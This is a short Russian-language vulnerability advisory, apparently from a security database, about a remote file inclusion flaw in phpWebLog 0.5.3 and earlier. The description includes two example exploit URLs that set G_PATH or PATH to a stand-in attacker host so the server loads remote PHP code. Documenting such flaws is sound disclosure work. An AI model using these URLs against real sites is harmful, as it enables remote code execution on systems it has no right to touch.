Дата публикации: | 09.03.2005 |
Всего просмотров: | 1399 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: phpWebLog 0.5.3 и более ранние версии
Описание: Уязвимость существует в сценариях 'include/init.inc.php' и 'backend/addons/links/index.php' из-за некорректной обработки входных данных в переменных 'G_PATH' и 'PATH'. Удаленный пользователь может помощью специально сформированного URL выполнить произвольный php сценарий на уязвимой системе. Пример: http://[target]/[dir]/include/init.inc.php?G_PATH=http://[attacker]/ http://[target]/[dir]/backend/addons/links/inde x.php?PATH=http://[attacker]/ URL производителя: http://phpweblog.org Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | phpWebLog Include File Flaw Lets Remote Users Execute Arbitrary Commands |